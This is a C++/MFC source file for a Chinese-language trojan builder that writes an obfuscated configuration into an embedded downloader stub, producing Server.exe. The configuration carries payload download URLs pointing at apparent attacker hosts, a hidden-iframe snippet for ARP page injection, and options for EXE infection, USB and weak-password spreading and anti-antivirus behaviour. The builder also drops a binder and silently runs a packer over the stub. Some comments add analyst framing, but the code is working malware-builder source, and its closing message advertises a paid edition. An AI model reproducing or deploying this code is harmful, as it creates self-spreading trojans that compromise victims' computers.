📄 webdownloaderdlg.cpp
// WebDownLoaderDlg.cpp : implementation file
//
#include "stdafx.h"
#include "WebDownLoader.h"
#include "WebDownLoaderDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
// Configuration record for the generated stub. OnOK() fills the string fields
// and WaitTime from the dialog, OnCheck() sets the flags, EncryptRecord()
// obfuscates the whole record, and CreateServer() copies sizeof(MODIFY_DATA)
// bytes of it into the embedded EXE image. The field order and sizes below are
// therefore the layout an analyst has to match when extracting a stub's config.
struct MODIFY_DATA
{
char DownFile[100];// URL of the download file list
char DownRunURL[100]; // URL of the "pcexec" download (original wording; the dialog default for this field is psexec.exe)
char DownRunFileURL[100]; // URL of the "Server" download
char ArpInject[256]; // HTML snippet injected into pages by the ARP-infection feature
char DownRunArpFile[100]; // URL used by the ARP feature
char DownRunBindFile[50]; // URL of the file-binder download
bool IsWorm;// whether EXE infection is enabled
bool IsUpan;// whether USB-drive spreading is enabled
bool IsShare;// whether weak-password spreading is enabled
bool IsAnti;// whether anti-antivirus behaviour is enabled
bool IsARP; // whether ARP infection is enabled
int WaitTime;// polling interval (minutes)
}modify_data =
{
// Placeholder defaults; OnOK() overwrites the string fields and WaitTime.
"http://127.0.0.1/down.list",
"http://127.0.0.1/",
"http://127.0.0.1/",
"<iframe src='http://xxx.htm' width=0 height=0>",
"http://127.0.0.1/",
"http://127.0.0.1/",
false,
false,
false,
false,
false,
20,
};
/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About
// Wizard-style "About" dialog class. It declares no data members and no
// message handlers of its own. The //{{AFX_...}} marker comments are left
// untouched.
class CAboutDlg : public CDialog
{
public:
CAboutDlg();
// Dialog Data
//{{AFX_DATA(CAboutDlg)
enum { IDD = IDD_ABOUTBOX };
//}}AFX_DATA
// ClassWizard generated virtual function overrides
//{{AFX_VIRTUAL(CAboutDlg)
public:
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
//}}AFX_VIRTUAL
// Implementation
protected:
//{{AFX_MSG(CAboutDlg)
//}}AFX_MSG
DECLARE_MESSAGE_MAP()
};
// Binds the dialog to the IDD_ABOUTBOX template; there is no member state to initialise.
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
//{{AFX_DATA_INIT(CAboutDlg)
//}}AFX_DATA_INIT
}
// Forwards to the base class; the About dialog has no DDX/DDV-bound controls.
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CAboutDlg)
//}}AFX_DATA_MAP
}
// Empty message map: every message goes to CDialog's default handling.
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
//{{AFX_MSG_MAP(CAboutDlg)
// No message handlers
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CWebDownLoaderDlg dialog
// Sets the initial values of the DDX-bound members before the dialog is shown.
// OnInitDialog() later overwrites the IDC_URL text with its own literal.
// NOTE(review): m_hIcon, which OnInitDialog() passes to SetIcon(), is not
// assigned in this constructor - confirm where it is loaded.
CWebDownLoaderDlg::CWebDownLoaderDlg(CWnd* pParent /*=NULL*/)
: CDialog(CWebDownLoaderDlg::IDD, pParent)
{
//{{AFX_DATA_INIT(CWebDownLoaderDlg)
m_Url = _T("http://www.rootkit.com.cn/down.exe");
m_Upan = TRUE;
m_Worm = FALSE;
m_Share = TRUE;
m_Reg = TRUE;
m_Anti = TRUE;
m_Time = 1;
m_IsCompress = FALSE;
//}}AFX_DATA_INIT
}
// Exchanges and validates data between the dialog controls and the members:
// IDC_URL <-> m_Url (at most 100 characters), IDC_CHECK1..IDC_CHECK6 <-> the
// BOOL option members, IDC_EDITTIME <-> m_Time (validated to 0..10000).
void CWebDownLoaderDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
//{{AFX_DATA_MAP(CWebDownLoaderDlg)
DDX_Text(pDX, IDC_URL, m_Url);
DDV_MaxChars(pDX, m_Url, 100);
//DDX_Text(pDX, IDC_COUNT, m_Count);
//DDV_MinMaxInt(pDX, m_Count, 0, 100);
DDX_Check(pDX, IDC_CHECK1, m_Upan);
DDX_Check(pDX, IDC_CHECK2, m_Worm);
DDX_Check(pDX, IDC_CHECK3, m_Share);
DDX_Check(pDX, IDC_CHECK4, m_Reg);
DDX_Check(pDX, IDC_CHECK5, m_Anti);
DDX_Text(pDX, IDC_EDITTIME, m_Time);
DDV_MinMaxInt(pDX, m_Time, 0, 10000);
DDX_Check(pDX, IDC_CHECK6, m_IsCompress);
//}}AFX_DATA_MAP
}
// Message routing for the builder dialog. Clicks on IDC_CHECK1..IDC_CHECK5 all
// go to OnCheck(); IDC_CHECK6 is outside that range and is only read through DDX.
// NOTE(review): the map has no ON_WM_SYSCOMMAND or ON_WM_PAINT entry, so the
// OnSysCommand()/OnPaint() handlers defined in this file do not appear to be
// wired up here - confirm against the header.
BEGIN_MESSAGE_MAP(CWebDownLoaderDlg, CDialog)
//{{AFX_MSG_MAP(CWebDownLoaderDlg)
ON_WM_QUERYDRAGICON()
ON_EN_CHANGE(IDC_URL, OnChangeUrl)
ON_EN_CHANGE(IDC_EDIT3, OnChangeEdit3)
ON_EN_CHANGE(IDC_EDITTIME, OnChangeEdittime)
//}}AFX_MSG_MAP
ON_COMMAND_RANGE(IDC_CHECK1,IDC_CHECK5,OnCheck)
END_MESSAGE_MAP()
/////////////////////////////////////////////////////////////////////////////
// CWebDownLoaderDlg message handlers
// Dialog start-up: adds the "About..." entry to the system menu, sets the
// icons, and pre-fills the edit controls with the tool's built-in defaults.
// Returns TRUE so that the framework assigns the initial focus.
BOOL CWebDownLoaderDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// Add "About..." menu item to system menu.
// IDM_ABOUTBOX must be in the system command range.
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
// Default field contents. OnOK() copies each control into modify_data:
// IDC_URL -> DownFile, IDC_EDIT3 -> DownRunURL, IDC_EDIT4 -> DownRunFileURL,
// IDC_EDIT5 -> ArpInject, IDC_EDIT1 -> DownRunArpFile, IDC_EDIT6 -> DownRunBindFile.
// A stub built without editing these fields carries this host and these
// file names in its (obfuscated) configuration record.
SetDlgItemText(IDC_URL, "http://www.8r1.cn/down.exe");
SetDlgItemText(IDC_EDIT3, "http://www.8r1.cn/psexec.exe");
SetDlgItemText(IDC_EDIT4, "http://www.8r1.cn/server.exe");
SetDlgItemText(IDC_EDIT5, "<iframe src='http://www.8r1.cn/muma.htm' width=0 height=0>");
SetDlgItemText(IDC_EDIT1, "http://www.8r1.cn");
SetDlgItemText(IDC_EDIT6, "http://www.8r1.cn/bind.exe");
// TODO: Add extra initialization here
return TRUE; // return TRUE unless you set the focus to a control
}
// Handles system-menu commands: the "About..." entry opens the About dialog
// modally, every other command is passed to CDialog unchanged.
void CWebDownLoaderDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
    // The low four bits of a system command id are masked off before comparing.
    const bool isAboutCommand = ((nID & 0xFFF0) == IDM_ABOUTBOX);
    if (!isAboutCommand)
    {
        CDialog::OnSysCommand(nID, lParam);
        return;
    }

    CAboutDlg aboutBox;
    aboutBox.DoModal();
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
// Paints the dialog. While minimised, the application icon is drawn centred in
// the client rectangle; otherwise painting is left to CDialog.
void CWebDownLoaderDlg::OnPaint()
{
    if (!IsIconic())
    {
        CDialog::OnPaint();
        return;
    }

    CPaintDC paintDc(this); // device context for painting
    SendMessage(WM_ICONERASEBKGND, (WPARAM) paintDc.GetSafeHdc(), 0);

    // Centre the icon inside the client area.
    const int iconWidth = GetSystemMetrics(SM_CXICON);
    const int iconHeight = GetSystemMetrics(SM_CYICON);
    CRect clientArea;
    GetClientRect(&clientArea);
    const int iconLeft = (clientArea.Width() - iconWidth + 1) / 2;
    const int iconTop = (clientArea.Height() - iconHeight + 1) / 2;

    paintDc.DrawIcon(iconLeft, iconTop, m_hIcon);
}
// The system calls this to obtain the cursor to display while the user drags
// the minimized window.
// Returns the dialog icon handle as the cursor shown while the minimised
// window is dragged.
HCURSOR CWebDownLoaderDlg::OnQueryDragIcon()
{
    HCURSOR dragCursor = (HCURSOR) m_hIcon;
    return dragCursor;
}
// Extracts the text after the last '/' of strFilePath into strOutFileName.
// Returns 0 on success, -1 when the path contains no '/', and -2 when fewer
// than three characters follow the last '/'. strOutFileName is only written
// on success.
int SplitFilePath(CString strFilePath,CString &strOutFileName)
{
    const CString separator = "/";

    // Walk forward through every separator, remembering the last one seen.
    int lastSlash = -1;
    for (int hit = strFilePath.Find(separator, 0);
         hit != -1;
         hit = strFilePath.Find(separator, hit + 1))
    {
        lastSlash = hit;
    }
    if (lastSlash == -1)
        return -1;

    const int pathLength = strFilePath.GetLength();
    if (pathLength - lastSlash < 4)
        return -2;

    const int nameLength = pathLength - lastSlash - 1;
    strOutFileName = strFilePath.Right(nameLength);
    return 0;
}
/* Obfuscation / de-obfuscation routines */
// Obfuscates nLen bytes at szRec in place: each byte is XORed with the current
// key byte and then has that key byte added to it. The NUL-terminated key
// szKey is repeated for as long as needed. This is a reversible byte
// transform, not real encryption; DecryptRecord() with the same key undoes it.
void EncryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
    char *keyCursor = szKey;
    char *const recordEnd = szRec + nLen;

    for (char *cur = szRec; cur != recordEnd; ++cur, ++keyCursor)
    {
        // Restart the key once its terminating NUL is reached.
        if (*keyCursor == '\0')
            keyCursor = szKey;

        *cur ^= *keyCursor;
        *cur += *keyCursor;
    }
}
// Reverses EncryptRecord() in place over nLen bytes at szRec: each byte has
// the current key byte subtracted and is then XORed with it. The
// NUL-terminated key szKey is repeated for as long as needed.
void DecryptRecord(char *szRec, unsigned long nLen, char *szKey)
{
    char *keyCursor = szKey;
    unsigned long remaining = nLen;

    while (remaining != 0)
    {
        // Restart the key once its terminating NUL is reached.
        if (*keyCursor == '\0')
            keyCursor = szKey;

        *szRec -= *keyCursor;
        *szRec ^= *keyCursor;

        ++szRec;
        ++keyCursor;
        --remaining;
    }
}
// OK-button handler and entry point of the builder. It copies the dialog's
// text fields and m_Time into the global modify_data record, obfuscates the
// whole record in place, then calls CreateServer(), CreateBindFile() and, when
// m_IsCompress is set, ComPress(). It ends with a message box and does not
// call CDialog::OnOK().
void CWebDownLoaderDlg::OnOK()
{
char strURL[100], strMuMaURL[100], strArpStr[256], strdownfile[100], strDownRunArpFile[100],
strDownBindFile[50];
UpdateData();
{
// Each GetDlgItemText() call passes the size of its local buffer, and each
// local buffer has the same size as the struct field it is copied into.
GetDlgItemText(IDC_URL, strdownfile, 100);
memset(modify_data.DownFile, 0, 100);
sprintf(modify_data.DownFile, "%s", strdownfile);
modify_data.WaitTime=m_Time;
// read the remaining fields
GetDlgItemText(IDC_EDIT3, strURL, 100);
memset(modify_data.DownRunURL, 0, 100);
sprintf(modify_data.DownRunURL, "%s", strURL);
GetDlgItemText(IDC_EDIT4, strMuMaURL, 100);
memset(modify_data.DownRunFileURL, 0, 100);
sprintf(modify_data.DownRunFileURL, "%s", strMuMaURL);
GetDlgItemText(IDC_EDIT5, strArpStr, 256);
memset(modify_data.ArpInject, 0, 256);
sprintf(modify_data.ArpInject, "%s", strArpStr);
GetDlgItemText(IDC_EDIT1, strDownRunArpFile, 100);
memset(modify_data.DownRunArpFile, 0, 100);
sprintf(modify_data.DownRunArpFile, "%s", strDownRunArpFile);
GetDlgItemText(IDC_EDIT6, strDownBindFile, 50);
memset(modify_data.DownRunBindFile, 0, 50);
sprintf(modify_data.DownRunBindFile, "%s", strDownBindFile);
// The entire struct (strings, flags and WaitTime) is obfuscated in place with
// the fixed key "1314". For analysis, DecryptRecord() with the same key over
// sizeof(MODIFY_DATA) bytes restores the plain record.
EncryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"1314");
}
CreateServer();
// extract the bundled "bind/infect" component
CreateBindFile();
if (m_IsCompress)
{
ComPress();
}
// The Chinese message reports that Server.exe was generated, advertises a paid
// "VIP" edition, lists features the demo edition does not support, and ends
// with a disclaimer about illegal use.
MessageBox("已经成功生成服务端:\nServer.exe [你的服务端]\n\n欢迎购买Vip版!\n\n演示版不支持:感染EXE&ARP网段挂马的修改\n\n\n此程序为编程研究,用户非法使用带来一切问题后过自负!","注意:");
}
// Click handler for IDC_CHECK1..IDC_CHECK5: refreshes the DDX members and
// stores the clicked option into the matching modify_data flag.
// NOTE(review): the member names do not line up with the flags they feed
// (m_Upan -> IsARP, m_Reg -> IsUpan); the case comments below are translated
// as written in the original.
void CWebDownLoaderDlg::OnCheck(UINT nID)
{
UpdateData();
switch(nID)
{
case IDC_CHECK1: // ARP page injection
modify_data.IsARP=m_Upan;
break;
case IDC_CHECK2: // infect EXE files
modify_data.IsWorm=m_Worm;
break;
case IDC_CHECK3: // weak passwords
modify_data.IsShare=m_Share;
break;
case IDC_CHECK4: // USB-drive spreading
modify_data.IsUpan=m_Reg;
break;
case IDC_CHECK5: // anti-antivirus
modify_data.IsAnti=m_Anti;
break;
}
}
// Writes the embedded IDR_BIND resource (type "EXE") into the current
// directory after overwriting 50 bytes at offset 0x6028 of the copy with the
// IDC_EDIT6 text. The output file name is whatever SplitFilePath() extracts
// from that text (the part after the last '/'). Returns silently on failure.
void CWebDownLoaderDlg::CreateBindFile()
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize,dwWritten;
LPBYTE p;
HANDLE hFile;
char strDownBindFile[50];
CString BindFileName, BindFilePath;
GetDlgItemText(IDC_EDIT6, strDownBindFile, 50);
BindFilePath = strDownBindFile;
// The return value of SplitFilePath() is not checked here.
SplitFilePath(BindFilePath, BindFileName);
// find the required resource
hResInfo = FindResource(NULL,MAKEINTRESOURCE(IDR_BIND),"EXE");
if(hResInfo == NULL) return;
// get the resource size
dwSize = SizeofResource(NULL,hResInfo);
// load the resource
hResData = LoadResource(NULL,hResInfo);
if(hResData == NULL) return;
// allocate space for the data
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL) return;
// copy the resource data
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
TCHAR szText[50];
memset(szText,0,sizeof(szText));
memcpy(szText, strDownBindFile, strlen(strDownBindFile));
// Patch the URL text into the image at a fixed offset (0x6028, 50 bytes).
CopyMemory((LPVOID)(p + 0x6028), (LPCVOID)szText, 50); //A
char Path[256], CreateFileName[256];
GetCurrentDirectory(256, Path);
memset(CreateFileName, 0, 256);
sprintf(CreateFileName, "%s\\%s", Path, BindFileName);
// Any existing file of that name is deleted and replaced.
DeleteFile(CreateFileName);
hFile = CreateFile(CreateFileName,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if(hFile == NULL) return;
WriteFile(hFile,(LPVOID)p,dwSize,&dwWritten,NULL);
CloseHandle(hFile);
return;
}
// Writes the embedded IDR_EXE resource (type "EXE") to "Server.exe" in the
// current directory after copying the global modify_data record (already
// obfuscated by OnOK()) into the copy at offset 0x7288. Returns silently on
// failure.
// NOTE(review): for config extraction the record is sizeof(MODIFY_DATA) bytes
// at that offset of the file as written here; if ComPress() runs afterwards
// the on-disk layout presumably changes - confirm on a sample.
void CWebDownLoaderDlg::CreateServer()
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize,dwWritten;
LPBYTE p;
HANDLE hFile;
// find the required resource
hResInfo = FindResource(NULL,MAKEINTRESOURCE(IDR_EXE),"EXE");
if(hResInfo == NULL) return;
// get the resource size
dwSize = SizeofResource(NULL,hResInfo);
// load the resource
hResData = LoadResource(NULL,hResInfo);
if(hResData == NULL) return;
// allocate space for the data
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL) return;
// copy the resource data
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
CopyMemory((LPVOID)(p + 0x7288), (LPCVOID)&modify_data,sizeof(MODIFY_DATA));// fill in the configuration record
char Path[256];
GetCurrentDirectory(256, Path);
strcat(Path,"\\Server.exe");
// Any existing Server.exe in the current directory is deleted and replaced.
DeleteFile(Path);
hFile = CreateFile(Path,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if(hFile == NULL) return;
WriteFile(hFile,(LPVOID)p,dwSize,&dwWritten,NULL);
CloseHandle(hFile);
return;
}
// Writes the embedded IDR_FSG resource (type "EXE") to "fsg.exe" in the
// current directory and launches it with "Server.exe" as its parameter and a
// hidden window (SW_HIDE). DestroyWindow() deletes fsg.exe again.
// NOTE(review): judging by the names this is presumably an executable packer
// run over the generated Server.exe - confirm on a sample.
void CWebDownLoaderDlg::ComPress()
{
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize,dwWritten;
LPBYTE p;
HANDLE hFile;
// find the required resource
hResInfo = FindResource(NULL,MAKEINTRESOURCE(IDR_FSG),"EXE");
if(hResInfo == NULL) return;
// get the resource size
dwSize = SizeofResource(NULL,hResInfo);
// load the resource
hResData = LoadResource(NULL,hResInfo);
if(hResData == NULL) return;
// allocate space for the data
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
if (p == NULL) return;
// copy the resource data
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
char Path[256];
GetCurrentDirectory(256, Path);
strcat(Path,"\\fsg.exe");
DeleteFile(Path);
hFile = CreateFile(Path,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
if(hFile == NULL) return;
WriteFile(hFile,(LPVOID)p,dwSize,&dwWritten,NULL);
CloseHandle(hFile);
// Process-creation telemetry would show fsg.exe started from the builder's
// working directory with the argument "Server.exe" and no visible window.
ShellExecute(this->m_hWnd,"open",Path,"Server.exe","",SW_HIDE);
}
// Deletes "fsg.exe" (the file ComPress() drops) from the current directory
// when the dialog is destroyed, then defers to CDialog::DestroyWindow() and
// returns its result. The result of DeleteFile() is not checked.
BOOL CWebDownLoaderDlg::DestroyWindow()
{
// TODO: Add your specialized code here and/or call the base class
char Path[256];
GetCurrentDirectory(256, Path);
strcat(Path,"\\fsg.exe");
DeleteFile(Path);
return CDialog::DestroyWindow();
}
// EN_CHANGE handler for IDC_URL (see the message map). Wizard stub: it
// contains no code.
void CWebDownLoaderDlg::OnChangeUrl()
{
// TODO: If this is a RICHEDIT control, the control will not
// send this notification unless you override the CDialog::OnInitDialog()
// function and call CRichEditCtrl().SetEventMask()
// with the ENM_CHANGE flag ORed into the mask.
// TODO: Add your control notification handler code here
}
// EN_CHANGE handler for IDC_EDIT3 (see the message map). Wizard stub: it
// contains no code.
void CWebDownLoaderDlg::OnChangeEdit3()
{
// TODO: If this is a RICHEDIT control, the control will not
// send this notification unless you override the CDialog::OnInitDialog()
// function and call CRichEditCtrl().SetEventMask()
// with the ENM_CHANGE flag ORed into the mask.
// TODO: Add your control notification handler code here
}
// EN_CHANGE handler for IDC_EDITTIME (see the message map). Wizard stub: it
// contains no code.
void CWebDownLoaderDlg::OnChangeEdittime()
{
// TODO: If this is a RICHEDIT control, the control will not
// send this notification unless you override the CDialog::OnInitDialog()
// function and call CRichEditCtrl().SetEventMask()
// with the ENM_CHANGE flag ORed into the mask.
// TODO: Add your control notification handler code here
}
// Cancel handler: defers to CDialog::OnCancel() with no extra work.
void CWebDownLoaderDlg::OnCancel()
{
CDialog::OnCancel();
}